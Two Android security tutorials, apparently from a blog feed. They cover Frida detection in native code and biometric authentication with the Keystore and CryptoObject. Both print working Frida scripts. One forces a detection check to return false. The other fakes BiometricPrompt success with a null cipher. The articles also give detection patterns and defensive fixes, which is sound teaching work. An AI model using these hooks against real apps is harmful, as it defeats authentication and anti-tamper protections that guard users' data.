            } else if (mode == Cipher.DECRYPT_MODE &amp;&amp; iv != null) {
                val gcmSpec = GCMParameterSpec(128, iv)
                cipher.init(Cipher.DECRYPT_MODE, key, gcmSpec)  // Use provided IV
            }
            true
        } catch (e: Exception) {
            e.printStackTrace()
            false
        }
    }

    // Show biometric prompt and tie it to the cipher object
    private fun showBiometricPrompt() {
        val executor = ContextCompat.getMainExecutor(this)
        val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
            override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
                super.onAuthenticationSucceeded(result)
                val cryptoObject = result.cryptoObject
                if (cryptoObject != null &amp;&amp; cryptoObject.cipher != null) {
                    try {
                        val decryptedData = decryptData(cryptoObject)
                        if (decryptedData == null || !isValidData(decryptedData)) {
                            Toast.makeText(this@MainActivity, &quot;Decryption failed or invalid data!&quot;, Toast.LENGTH_SHORT).show()
                        } else {
                            showSuccess()
                        }
                    } catch (e: Exception) {
                        e.printStackTrace()
                        Toast.makeText(this@MainActivity, &quot;Decryption error!&quot;, Toast.LENGTH_SHORT).show()
                    }
                } else {
                    Toast.makeText(this@MainActivity, &quot;Authentication succeeded but CryptoObject is missing!&quot;, Toast.LENGTH_SHORT).show()
                }
            }
            override fun onAuthenticationFailed() {
                super.onAuthenticationFailed()
                Toast.makeText(this@MainActivity, &quot;Authentication failed&quot;, Toast.LENGTH_SHORT).show()
            }
        })

        if (initCipher(Cipher.DECRYPT_MODE, retrieveStoredIV())) {
            val cryptoObject = BiometricPrompt.CryptoObject(cipher)
            val promptInfo = BiometricPrompt.PromptInfo.Builder()
                .setTitle(&quot;Biometric Authentication&quot;)
                .setSubtitle(&quot;Log in using your fingerprint&quot;)
                .setNegativeButtonText(&quot;Use password&quot;)
                .build()

            biometricPrompt.authenticate(promptInfo, cryptoObject)
        }
    }

    // Updated: Fixing how cipher is used after biometric authentication completes
    private fun showBiometricPromptForEncryption(plainText: String) {
        val executor = ContextCompat.getMainExecutor(this)
        val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
            override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
                super.onAuthenticationSucceeded(result)
                val cryptoObject = result.cryptoObject
                if (cryptoObject != null) {
                    try {
                        // Encrypt after biometric authentication
                        val encryptedData = cryptoObject.cipher?.doFinal(plainText.toByteArray())
                        if (encryptedData != null) {
                            val iv = cryptoObject.cipher?.iv  // Get the generated IV
                            storeEncryptedDataAndIV(Base64.encodeToString(encryptedData, Base64.DEFAULT), iv!!)
                            Toast.makeText(this@MainActivity, &quot;Encryption successful!&quot;, Toast.LENGTH_SHORT).show()
                        }
                    } catch (e: Exception) {
                        e.printStackTrace()
                        Toast.makeText(this@MainActivity, &quot;Encryption error!&quot;, Toast.LENGTH_SHORT).show()
                    }
                }
            }

            override fun onAuthenticationFailed() {
                super.onAuthenticationFailed()
                Toast.makeText(this@MainActivity, &quot;Authentication failed&quot;, Toast.LENGTH_SHORT).show()
            }
        })

        if (initCipher(Cipher.ENCRYPT_MODE)) {
            val cryptoObject = BiometricPrompt.CryptoObject(cipher)
            val promptInfo = BiometricPrompt.PromptInfo.Builder()
                .setTitle(&quot;Biometric Authentication for Encryption&quot;)
                .setSubtitle(&quot;Use your fingerprint to encrypt data&quot;)
                .setNegativeButtonText(&quot;Use password&quot;)
                .build()

            biometricPrompt.authenticate(promptInfo, cryptoObject)
        }
    }

    // Check if decrypted data is valid
    private fun isValidData(decryptedData: ByteArray): Boolean {
        return decryptedData.contentEquals(expectedData)  // Example validation
    }

    // Decrypt data using the CryptoObject
    private fun decryptData(cryptoObject: BiometricPrompt.CryptoObject): ByteArray? {
        return try {
            val encryptedData = Base64.decode(retrieveEncryptedData(), Base64.DEFAULT)
            val iv = retrieveStoredIV()  // Retrieve the stored IV
            if (initCipher(Cipher.DECRYPT_MODE, iv)) {  // Use the retrieved IV
                val decryptedData = cryptoObject.cipher?.doFinal(encryptedData)
                decryptedData
            } else {
                null
            }
        } catch (e: Exception) {
            e.printStackTrace()
            null
        }
    }

    private fun encryptAndStoreData(plainText: String) {
        if (initCipher(Cipher.ENCRYPT_MODE)) {
            try {
                val encryptedData = cipher.doFinal(plainText.toByteArray())
                val iv = cipher.iv  // Get the generated IV
                storeEncryptedDataAndIV(Base64.encodeToString(encryptedData, Base64.DEFAULT), iv)
            } catch (e: Exception) {
                e.printStackTrace()
                Toast.makeText(this, &quot;Encryption failed&quot;, Toast.LENGTH_SHORT).show()
            }
        }
    }

    // Simulate storing encrypted data and IV (replace with actual storage logic)
    private fun storeEncryptedDataAndIV(encryptedData: String, iv: ByteArray) {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        val editor = sharedPreferences.edit()
        editor.putString(&quot;encrypted_data&quot;, encryptedData)
        editor.putString(&quot;iv&quot;, Base64.encodeToString(iv, Base64.DEFAULT))  // Store the IV as Base64 string
        editor.apply()
    }

    // Retrieve encrypted data and IV
    private fun retrieveEncryptedData(): String {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        return sharedPreferences.getString(&quot;encrypted_data&quot;, &quot;&quot;) ?: &quot;&quot;
    }

    private fun retrieveStoredIV(): ByteArray {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        val ivString = sharedPreferences.getString(&quot;iv&quot;, null)
        return Base64.decode(ivString, Base64.DEFAULT)
    }

    private fun showSuccess() {
        Toast.makeText(this, &quot;Authentication successful!&quot;, Toast.LENGTH_SHORT).show()
        val intent = Intent(this, SuccessActivity::class.java)
        startActivity(intent)
        finish()  // Optionally finish MainActivity to prevent going back without re-authentication
    }
    private fun resetEncryptedData() {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        val editor = sharedPreferences.edit()
        editor.remove(&quot;encrypted_data&quot;)  // Remove encrypted data
        editor.remove(&quot;iv&quot;)  // Remove IV
        editor.apply()
        Log.d(&quot;Reset&quot;, &quot;Encrypted data and IV reset.&quot;)
        Toast.makeText(this, &quot;Encrypted data reset.&quot;, Toast.LENGTH_SHORT).show()
    }
}

```
&lt;/details&gt;


# Implementing Frida Detection with a Native Library

Now that we&apos;ve covered how native libraries can be used for security measures like Frida detection, let&apos;s look at a typical implementation developers often use to detect Frida in an Android app with native code. The following example shows a native function that performs common checks to identify suspicious libraries, processes, and network activity associated with Frida.

&lt;details&gt;
&lt;summary&gt;Native Code for Detecting Frida&lt;/summary&gt;

```cpp
#include &lt;jni.h&gt;
#include &lt;string&gt;
#include &lt;dirent.h&gt;  // To scan directories
#include &lt;unistd.h&gt;  // For access function
#include &lt;fstream&gt;   // To check for Frida processes
#include &lt;sys/types.h&gt;
#include &lt;sys/stat.h&gt;

extern &quot;C&quot; JNIEXPORT jstring JNICALL
Java_com_example_localauth_MainActivity_stringFromJNI(
        JNIEnv* env,
        jobject /* this */) {
    std::string hello = &quot;Hello from C++&quot;;
    return env-&gt;NewStringUTF(hello.c_str());
}

extern &quot;C&quot;
JNIEXPORT jboolean JNICALL
Java_com_example_localauth_MainActivity_detectFrida(
        JNIEnv* env,
        jobject /* this */) {

    // 1. Check for well-known Frida artifacts on the filesystem
    // (access() takes a path, so bare library names would never match)
    const char* suspiciousPaths[] = {
            &quot;/data/local/tmp/frida-server&quot;,
            &quot;/data/local/tmp/re.frida.server&quot;
    };

    for (const char* path : suspiciousPaths) {
        // access() with F_OK tests whether the file exists on disk
        if (access(path, F_OK) != -1) {
            return JNI_TRUE;  // Frida detected
        }
    }

    // 2. Check for Frida libraries mapped into the current process
    std::ifstream procList(&quot;/proc/self/maps&quot;);
    std::string line;
    while (std::getline(procList, line)) {
        if (line.find(&quot;frida&quot;) != std::string::npos) {
            return JNI_TRUE;  // Frida detected
        }
    }

    // 3. Check if frida-server is listening on its default ports
    // (/proc/net/tcp encodes addresses in hex: 27042 = 0x69A2, 27043 = 0x69A3)
    std::ifstream netstat(&quot;/proc/net/tcp&quot;);
    while (std::getline(netstat, line)) {
        if (line.find(&quot;:69A2&quot;) != std::string::npos ||  // Default frida-server port (27042)
            line.find(&quot;:69A3&quot;) != std::string::npos) {  // Alternative port (27043)
            return JNI_TRUE;  // Frida detected
        }
    }

    // If no detection was successful
    return JNI_FALSE;
}


```
&lt;/details&gt;


The `detectFrida()` function performs several checks to detect if Frida is being used on the device:

1.  **Checking for Suspicious Files**: Frida leaves recognizable artifacts on disk, such as the frida-server binary or gadget libraries. The function uses `access()` to test whether any of these well-known paths exist. If one does, it immediately returns `JNI_TRUE`, indicating Frida’s presence.
2.  **Scanning Process Memory Mappings**: The function reads `/proc/self/maps`, which lists the memory mappings of the current process. If any mapping contains the string &quot;frida&quot;, a Frida agent or gadget library has been injected into the process.
3.  **Checking Network Ports**: frida-server listens on specific TCP ports by default (`27042` and `27043`). The function scans `/proc/net/tcp`, which lists all open TCP sockets with addresses encoded in hexadecimal, for entries on these ports.

If any of these checks succeed, the function returns `JNI_TRUE`, signaling that Frida is detected. Otherwise, it returns `JNI_FALSE`.

### How to Use the `detectFrida()` Function in Kotlin

After implementing the native function in C++, the next step is to call it from your Kotlin (or Java) code to utilize the Frida detection mechanism.

#### 1. **Declare the Native Function**

In your `MainActivity.kt`, declare the `detectFrida()` function using the `external` keyword:

```kotlin
external fun detectFrida(): Boolean

```

#### 2. **Call the Frida Detection Function**

You can now call the `detectFrida()` function at any point in your app to check if Frida is present:

```kotlin
if (detectFrida()) {
    Log.d(&quot;Security&quot;, &quot;Frida detected!&quot;)
    showFridaDetectedDialog()
} else {
    Log.d(&quot;Security&quot;, &quot;No Frida detected.&quot;)
}

```

![](/content/images/2024/10/image-3.png)

Detection of Frida

&lt;details&gt;
&lt;summary&gt;MainActivity&lt;/summary&gt;

```kotlin
package com.example.localauth

import android.content.Intent
import android.app.AlertDialog
import android.content.DialogInterface
import android.os.Bundle
import android.util.Base64
import android.widget.Button
import android.widget.Toast
import androidx.appcompat.app.AppCompatActivity
import androidx.biometric.BiometricPrompt
import androidx.core.content.ContextCompat
import java.security.KeyStore
import javax.crypto.Cipher
import javax.crypto.KeyGenerator
import javax.crypto.SecretKey
import android.security.keystore.KeyGenParameterSpec
import android.security.keystore.KeyProperties
import android.util.Log
import javax.crypto.spec.GCMParameterSpec

class MainActivity : AppCompatActivity() {

    private lateinit var cipher: Cipher
    private lateinit var keyStore: KeyStore
    private val keyAlias = &quot;test&quot;
    val expectedData = &quot;PASSWORD&quot;.toByteArray()

    companion object {
        init {
            System.loadLibrary(&quot;native-lib&quot;) // without the &quot;lib&quot; prefix or the &quot;.so&quot; suffix
        }
    }
    external fun stringFromJNI(): String
    external fun detectFrida(): Boolean

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)
        val messageFromNative = stringFromJNI()
        Log.d(&quot;JNI&quot;, &quot;Message from C++: $messageFromNative&quot;)

        if (detectFrida()) {
            Log.d(&quot;Security&quot;, &quot;Frida detected!&quot;)
            showFridaDetectedDialog()
        } else {
            Log.d(&quot;Security&quot;, &quot;No Frida detected.&quot;)
        }

        createKey()

        val btnEncrypt: Button = findViewById(R.id.btn_encrypt)
        btnEncrypt.setOnClickListener {
            showBiometricPromptForEncryption(&quot;PASSWORD&quot;)
        }

        val btnReset: Button = findViewById(R.id.btn_reset)
        btnReset.setOnClickListener {
            resetEncryptedData()
        }

        val btnAuthenticate: Button = findViewById(R.id.btn_authenticate)
        btnAuthenticate.setOnClickListener {
            showBiometricPrompt()
        }
    }


    // Create Key in Keystore
    private fun createKey() {
        val keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, &quot;AndroidKeyStore&quot;)
        val keyGenParameterSpec = KeyGenParameterSpec.Builder(
            keyAlias,
            KeyProperties.PURPOSE_ENCRYPT or KeyProperties.PURPOSE_DECRYPT
        ).setBlockModes(KeyProperties.BLOCK_MODE_GCM)
            .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
            .setUserAuthenticationRequired(true)
            .setInvalidatedByBiometricEnrollment(true)
            .setUserAuthenticationValidityDurationSeconds(-1)  // Require biometric every time
            .build()

        keyGenerator.init(keyGenParameterSpec)
        keyGenerator.generateKey()
    }

    // Initialize the cipher for encryption/decryption
    private fun initCipher(mode: Int, iv: ByteArray? = null): Boolean {
        return try {
            keyStore = KeyStore.getInstance(&quot;AndroidKeyStore&quot;)
            keyStore.load(null)

            val key = keyStore.getKey(keyAlias, null) as SecretKey
            cipher = Cipher.getInstance(&quot;${KeyProperties.KEY_ALGORITHM_AES}/${KeyProperties.BLOCK_MODE_GCM}/${KeyProperties.ENCRYPTION_PADDING_NONE}&quot;)

            if (mode == Cipher.ENCRYPT_MODE) {
                cipher.init(Cipher.ENCRYPT_MODE, key)  // Generate new IV
            } else if (mode == Cipher.DECRYPT_MODE &amp;&amp; iv != null) {
                val gcmSpec = GCMParameterSpec(128, iv)
                cipher.init(Cipher.DECRYPT_MODE, key, gcmSpec)  // Use provided IV
            }
            true
        } catch (e: Exception) {
            e.printStackTrace()
            false
        }
    }

    // Show biometric prompt and tie it to the cipher object
    private fun showBiometricPrompt() {
        val executor = ContextCompat.getMainExecutor(this)
        val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
            override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
                super.onAuthenticationSucceeded(result)
                val cryptoObject = result.cryptoObject
                if (cryptoObject != null &amp;&amp; cryptoObject.cipher != null) {
                    try {
                        val decryptedData = decryptData(cryptoObject)
                        if (decryptedData == null || !isValidData(decryptedData)) {
                            Toast.makeText(this@MainActivity, &quot;Decryption failed or invalid data!&quot;, Toast.LENGTH_SHORT).show()
                        } else {
                            showSuccess()
                        }
                    } catch (e: Exception) {
                        e.printStackTrace()
                        Toast.makeText(this@MainActivity, &quot;Decryption error!&quot;, Toast.LENGTH_SHORT).show()
                    }
                } else {
                    Toast.makeText(this@MainActivity, &quot;Authentication succeeded but CryptoObject is missing!&quot;, Toast.LENGTH_SHORT).show()
                }
            }
            override fun onAuthenticationFailed() {
                super.onAuthenticationFailed()
                Toast.makeText(this@MainActivity, &quot;Authentication failed&quot;, Toast.LENGTH_SHORT).show()
            }
        })

        if (initCipher(Cipher.DECRYPT_MODE, retrieveStoredIV())) {
            val cryptoObject = BiometricPrompt.CryptoObject(cipher)
            val promptInfo = BiometricPrompt.PromptInfo.Builder()
                .setTitle(&quot;Biometric Authentication&quot;)
                .setSubtitle(&quot;Log in using your fingerprint&quot;)
                .setNegativeButtonText(&quot;Use password&quot;)
                .build()

            biometricPrompt.authenticate(promptInfo, cryptoObject)
        }
    }

    // Updated: Fixing how cipher is used after biometric authentication completes
    private fun showBiometricPromptForEncryption(plainText: String) {
        val executor = ContextCompat.getMainExecutor(this)
        val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
            override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
                super.onAuthenticationSucceeded(result)
                val cryptoObject = result.cryptoObject
                if (cryptoObject != null) {
                    try {
                        // Encrypt after biometric authentication
                        val encryptedData = cryptoObject.cipher?.doFinal(plainText.toByteArray())
                        if (encryptedData != null) {
                            val iv = cryptoObject.cipher?.iv  // Get the generated IV
                            storeEncryptedDataAndIV(Base64.encodeToString(encryptedData, Base64.DEFAULT), iv!!)
                            Toast.makeText(this@MainActivity, &quot;Encryption successful!&quot;, Toast.LENGTH_SHORT).show()
                        }
                    } catch (e: Exception) {
                        e.printStackTrace()
                        Toast.makeText(this@MainActivity, &quot;Encryption error!&quot;, Toast.LENGTH_SHORT).show()
                    }
                }
            }

            override fun onAuthenticationFailed() {
                super.onAuthenticationFailed()
                Toast.makeText(this@MainActivity, &quot;Authentication failed&quot;, Toast.LENGTH_SHORT).show()
            }
        })

        if (initCipher(Cipher.ENCRYPT_MODE)) {
            val cryptoObject = BiometricPrompt.CryptoObject(cipher)
            val promptInfo = BiometricPrompt.PromptInfo.Builder()
                .setTitle(&quot;Biometric Authentication for Encryption&quot;)
                .setSubtitle(&quot;Use your fingerprint to encrypt data&quot;)
                .setNegativeButtonText(&quot;Use password&quot;)
                .build()

            biometricPrompt.authenticate(promptInfo, cryptoObject)
        }
    }

    // Check if decrypted data is valid
    private fun isValidData(decryptedData: ByteArray): Boolean {
        return decryptedData.contentEquals(expectedData)  // Example validation
    }

    // Decrypt data using the CryptoObject
    private fun decryptData(cryptoObject: BiometricPrompt.CryptoObject): ByteArray? {
        return try {
            val encryptedData = Base64.decode(retrieveEncryptedData(), Base64.DEFAULT)
            val iv = retrieveStoredIV()  // Retrieve the stored IV
            if (initCipher(Cipher.DECRYPT_MODE, iv)) {  // Use the retrieved IV
                val decryptedData = cryptoObject.cipher?.doFinal(encryptedData)
                decryptedData
            } else {
                null
            }
        } catch (e: Exception) {
            e.printStackTrace()
            null
        }
    }

    private fun encryptAndStoreData(plainText: String) {
        if (initCipher(Cipher.ENCRYPT_MODE)) {
            try {
                val encryptedData = cipher.doFinal(plainText.toByteArray())
                val iv = cipher.iv  // Get the generated IV
                storeEncryptedDataAndIV(Base64.encodeToString(encryptedData, Base64.DEFAULT), iv)
            } catch (e: Exception) {
                e.printStackTrace()
                Toast.makeText(this, &quot;Encryption failed&quot;, Toast.LENGTH_SHORT).show()
            }
        }
    }

    // Simulate storing encrypted data and IV (replace with actual storage logic)
    private fun storeEncryptedDataAndIV(encryptedData: String, iv: ByteArray) {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        val editor = sharedPreferences.edit()
        editor.putString(&quot;encrypted_data&quot;, encryptedData)
        editor.putString(&quot;iv&quot;, Base64.encodeToString(iv, Base64.DEFAULT))  // Store the IV as Base64 string
        editor.apply()
    }

    // Retrieve encrypted data and IV
    private fun retrieveEncryptedData(): String {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        return sharedPreferences.getString(&quot;encrypted_data&quot;, &quot;&quot;) ?: &quot;&quot;
    }

    private fun retrieveStoredIV(): ByteArray {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        val ivString = sharedPreferences.getString(&quot;iv&quot;, null)
        return Base64.decode(ivString, Base64.DEFAULT)
    }

    private fun showSuccess() {
        Toast.makeText(this, &quot;Authentication successful!&quot;, Toast.LENGTH_SHORT).show()
        val intent = Intent(this, SuccessActivity::class.java)
        startActivity(intent)
        finish()  // Optionally finish MainActivity to prevent going back without re-authentication
    }
    private fun resetEncryptedData() {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        val editor = sharedPreferences.edit()
        editor.remove(&quot;encrypted_data&quot;)  // Remove encrypted data
        editor.remove(&quot;iv&quot;)  // Remove IV
        editor.apply()
        Log.d(&quot;Reset&quot;, &quot;Encrypted data and IV reset.&quot;)
        Toast.makeText(this, &quot;Encrypted data reset.&quot;, Toast.LENGTH_SHORT).show()
    }

    // Show a message to the user when Frida is detected and close the app
    private fun showFridaDetectedDialog() {
        val builder = AlertDialog.Builder(this)
        builder.setTitle(&quot;Security Warning&quot;)
        builder.setMessage(&quot;Frida or another tampering tool has been detected. The app will now close for security reasons.&quot;)
        builder.setCancelable(false)
        builder.setPositiveButton(&quot;OK&quot;) { dialog: DialogInterface, _: Int -&gt;
            dialog.dismiss()
            closeApp()
        }
        val dialog: AlertDialog = builder.create()
        dialog.show()
    }

    // Method to close the app
    private fun closeApp() {
        Toast.makeText(this, &quot;Closing app...&quot;, Toast.LENGTH_SHORT).show()
        finishAffinity()  // Close the app completely
    }
}

```
&lt;/details&gt;


# Limitations and Evasion of Native Frida Detection

Although this native Frida detection is a useful technique to enhance security, it is relatively easy to bypass. Whether using Frida itself or through [reverse engineering with tools like **JADX**](https://www.kayssel.com/post/android-4/), attackers can effectively neutralize these detection mechanisms with minimal effort.

![](/content/images/2024/10/image-4.png)

The Frida detection function identified during reverse engineering

One of the simplest ways to bypass native detection mechanisms is to use Frida itself. By hooking into the app&apos;s runtime, you can modify the behavior of the detection function and force it to return a benign result. Here’s an example of how you can bypass the `detectFrida()` function using a Frida script:

```javascript
Java.perform(function() {
    // Hook a method in an Android app (replace the class and method names)
    var MainActivity = Java.use(&apos;com.example.localauth.MainActivity&apos;);

    // Intercept the method and modify its return value
    MainActivity.detectFrida.implementation = function() {
        console.log(&quot;Bypassing detectFrida method...&quot;);
        return false;  // Always return false to bypass Frida detection
    };
});

```

![](/content/images/2024/09/image-21.png)

Frida detection bypass

This script works by hooking into the `MainActivity` class and replacing the implementation of the `detectFrida()` function. Instead of executing the original detection logic, the script ensures that the function always returns `false`, indicating that no Frida processes are detected, effectively bypassing the security check.

-   **`Java.use(&apos;com.example.localauth.MainActivity&apos;)`**: Hooks into the `MainActivity` class, where the `detectFrida()` function is defined.
-   **Modifying the Function**: The original implementation of `detectFrida()` is replaced, and it now always returns `false`, preventing the app from detecting Frida.

This approach is particularly effective because, although the detection logic lives in native code, it is exposed through a Java-declared method: Frida can replace the method&apos;s registered implementation at the Java layer without having to patch the native library itself.

# Conclusions

Using native libraries in Android applications can greatly improve security by making it harder to manipulate the app&apos;s runtime or bypass its defenses. Since native code operates outside the managed Android runtime, it provides a stronger layer of protection against tampering, reverse engineering, and dynamic analysis tools like Frida. This deeper level of integration reinforces existing security mechanisms, such as SSL pinning or root detection, by adding barriers that operate at the system level.

However, even with these protections in place, it’s important to understand that skilled adversaries can still find ways to bypass native defenses. Tools like Frida can be used to hook into the app and disable security checks, highlighting the need for a more comprehensive security approach that anticipates these potential bypasses.

In the next chapter, we’ll explore more advanced scenarios where circumventing protections becomes significantly more challenging. We’ll discuss techniques that make it difficult to rely on tools like Frida and may require deeper methods, such as reverse engineering the native library, to successfully overcome security measures. This will help uncover the strategies needed to navigate more complex security setups.</content:encoded><author>Ruben Santos</author></item><item><title>Securing Biometric Authentication: Defending Against Frida Bypass Attacks</title><link>https://www.kayssel.com/post/android-8</link><guid isPermaLink="true">https://www.kayssel.com/post/android-8</guid><description>This article explains how attackers use Frida to bypass biometric authentication and how to defend against it. By understanding the Android Keystore, CryptoObject, and encryption, we implement security measures to protect sensitive data and strengthen biometric authentication in Android apps.</description><pubDate>Sun, 29 Sep 2024 10:38:02 GMT</pubDate><content:encoded># Introduction

In the previous chapter, I focused on the basic concepts of local authentication and its vulnerabilities. In this chapter, I&apos;ll delve deeper into the system, explaining how attackers can bypass biometric authentication using Frida and, more importantly, how developers can secure their implementations against these types of attacks.

Here’s what I’ll cover:

-   **How the Bypass Works**: I’ll explain the mechanisms behind how attackers use Frida to bypass biometric authentication, altering key functions to simulate successful authentication.
-   **How the Android Keystore and CryptoObject Work**: A deep dive into the role of the Android Keystore and CryptoObject in securing biometric authentication and why they are critical for protecting sensitive operations.
-   **Implementing Changes to Our Insecure App**: I’ll walk through the steps to strengthen our previously insecure application by making necessary changes to improve biometric security.
-   **Testing the Changes**: Finally, I’ll demonstrate how to test these improvements and verify that the app is now more resilient to bypass attempts.

The goal of this chapter is to dive deep into the inner workings of Frida, understand how these attacks are carried out, and explore the necessary steps to defend against them. While Frida can be a powerful tool for attackers, with the right defense mechanisms, it’s possible to significantly reduce the risk of these bypass attempts.

# Bypassing Biometric Authentication with Frida: How it Works

[The Frida script](https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js) is designed to bypass biometric authentication in Android applications by manipulating the flow of biometric prompts at runtime. Frida, a powerful dynamic instrumentation toolkit, allows attackers to hook into application methods and modify their behavior on the fly. In this case, the script overrides how biometric authentication operates, forcing the app to treat any authentication attempt as successful, even if no real biometric data is provided.

#### Hooking into Biometric Authentication Methods

The first step the script takes is hooking into Android&apos;s biometric authentication methods. The script supports different Android APIs, from the modern `BiometricPrompt.authenticate()` method introduced in Android 9 (API 28) to the older `FingerprintManager.authenticate()` for pre-Android 9 versions.

```javascript
var biometricPrompt = Java.use(&apos;android.hardware.biometrics.BiometricPrompt&apos;)[&apos;authenticate&apos;].overload(&apos;android.os.CancellationSignal&apos;, &apos;java.util.concurrent.Executor&apos;, &apos;android.hardware.biometrics.BiometricPrompt$AuthenticationCallback&apos;);
console.log(&quot;Hooking BiometricPrompt.authenticate()...&quot;);
biometricPrompt.implementation = function (cancellationSignal, executor, callback) {
console.log(&quot;[BiometricPrompt.authenticate()]: Hooked!&quot;);
    var authenticationResultInst = getBiometricPromptAuthResult();
    callback.onAuthenticationSucceeded(authenticationResultInst); // Force success
}

```

In the code above, the script hooks into the `BiometricPrompt.authenticate()` method and replaces its implementation. Normally, this method would invoke biometric authentication and wait for user input (such as fingerprint recognition). However, the script intercepts the call and directly creates a fake authentication result. It then invokes the `onAuthenticationSucceeded()` callback, making the app believe that biometric authentication was successful.

#### Forcing `onAuthenticationSucceeded()`

The key part of this script is the forced invocation of `onAuthenticationSucceeded()`. This callback is designed to be triggered only after the user has successfully authenticated. However, the script manipulates it by passing in a fabricated `AuthenticationResult` object that simulates success. Here&apos;s how this is done:

```javascript
function getBiometricPromptAuthResult() {
    var sweet_cipher = null;  // Null cipher
    var cryptoObj = Java.use(&apos;android.hardware.biometrics.BiometricPrompt$CryptoObject&apos;);
    var cryptoInst = cryptoObj.$new(sweet_cipher);  // Create a CryptoObject with null cipher
    var authenticationResultObj = Java.use(&apos;android.hardware.biometrics.BiometricPrompt$AuthenticationResult&apos;);
    var authenticationResultInst = getAuthResult(authenticationResultObj, cryptoInst);
    return authenticationResultInst;
}

```

In this part of the script, a `CryptoObject` is created with a null cipher (`sweet_cipher = null`). The `CryptoObject` usually contains a valid `Cipher`, used to perform encryption or decryption. However, in this case, the cipher is set to null, which could allow the app to bypass cryptographic checks if it doesn&apos;t properly validate the `CryptoObject`. After creating this manipulated `CryptoObject`, the script wraps it in an `AuthenticationResult` object and passes it to the app, which accepts it as if it came from a valid authentication flow.
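The reason a properly validated `CryptoObject` defeats this bypass is that AES-GCM is *authenticated* encryption: without the genuine Keystore-backed cipher, `doFinal()` fails integrity verification instead of producing plaintext. The following minimal sketch reproduces this on a plain JVM using only `javax.crypto` (no Android Keystore involved), so the key names and sample plaintext are illustrative only:

```kotlin
import javax.crypto.AEADBadTagException
import javax.crypto.Cipher
import javax.crypto.KeyGenerator
import javax.crypto.spec.GCMParameterSpec

fun main() {
    val keyGen = KeyGenerator.getInstance("AES").apply { init(256) }
    val realKey = keyGen.generateKey()      // stands in for the Keystore-backed key
    val attackerKey = keyGen.generateKey()  // any key an attacker could fabricate

    // Encrypt with the real key; the cipher generates a fresh IV
    val enc = Cipher.getInstance("AES/GCM/NoPadding")
    enc.init(Cipher.ENCRYPT_MODE, realKey)
    val ciphertext = enc.doFinal("PASSWORD".toByteArray())
    val iv = enc.iv  // must be stored alongside the ciphertext

    // Decrypting with the wrong key fails GCM's authentication-tag check
    val dec = Cipher.getInstance("AES/GCM/NoPadding")
    dec.init(Cipher.DECRYPT_MODE, attackerKey, GCMParameterSpec(128, iv))
    try {
        dec.doFinal(ciphertext)
        println("decryption unexpectedly succeeded")
    } catch (e: AEADBadTagException) {
        println("decryption failed without the real key")
    }
}
```

On Android, the same guarantee comes from initializing the cipher with the Keystore key (as the app&apos;s `initCipher()` does) and passing it through the `CryptoObject`: a fabricated authentication result carrying a null or attacker-controlled cipher can never decrypt the stored secret.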

#### Handling Different Android API Versions

To maximize compatibility across different Android versions, the script handles various biometric APIs. It first attempts to hook into the `BiometricPrompt` API introduced in Android 9, but it also includes fallback mechanisms for older APIs, like `FingerprintManager`:

```javascript
try { hookBiometricPrompt_authenticate(); }
catch (error) { console.log(&quot;hookBiometricPrompt_authenticate not supported on this android version&quot;) }

try { hookFingerprintManagerCompat_authenticate(); }
catch (error) { console.log(&quot;hookFingerprintManagerCompat_authenticate failed&quot;); }


```

If the device uses an older version of Android, the script tries to hook into the `FingerprintManagerCompat` API, ensuring that the attack works on a broader range of devices. This adaptability is one of the script’s strengths, as it can bypass biometric authentication on both newer and older Android versions.

#### Why the Attack Works

The success of this attack depends largely on whether the application properly validates the `CryptoObject` and its associated `Cipher`. If the app simply checks whether `onAuthenticationSucceeded()` was called without further validation, the null cipher will bypass both biometric authentication and cryptographic protections. The app might proceed to decrypt sensitive data or grant access to protected areas based on this manipulated authentication flow.

Here’s an example of how to prevent this kind of attack by ensuring that the `CryptoObject` and its cipher are properly validated:

```kotlin
override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
    val cryptoObject = result.cryptoObject
    if (cryptoObject != null &amp;&amp; cryptoObject.cipher != null) {
        // Perform secure operations only if the cipher is valid
        // (encryptedData is the ciphertext previously stored by the app)
        val decryptedData = cryptoObject.cipher?.doFinal(encryptedData)
        // Process decrypted data
    } else {
        Toast.makeText(this@MainActivity, &quot;Invalid CryptoObject or Cipher!&quot;, Toast.LENGTH_SHORT).show()
    }
}

```

In the example above, we check if both the `CryptoObject` and its `Cipher` are non-null before performing any sensitive operations. This would prevent the Frida script from bypassing biometric authentication with a null cipher.

# Understanding the Keystore and CryptoObject in Android

Now that we&apos;ve explored how the Frida script works, it&apos;s time to take a closer look at two critical components: the Keystore and CryptoObject. These play a central role in securing local authentication and protecting sensitive data, so let&apos;s dive deeper into how they function and why they&apos;re essential.

## The Android Keystore System

The **Android Keystore** is a system designed to securely store cryptographic keys, ensuring that sensitive information is protected even if the app is compromised. Keys stored in the Keystore are hardware-backed (if the device supports it), which means that even with root access, extracting these keys directly is extremely difficult. This is crucial for protecting encryption keys, which in turn secure user data.
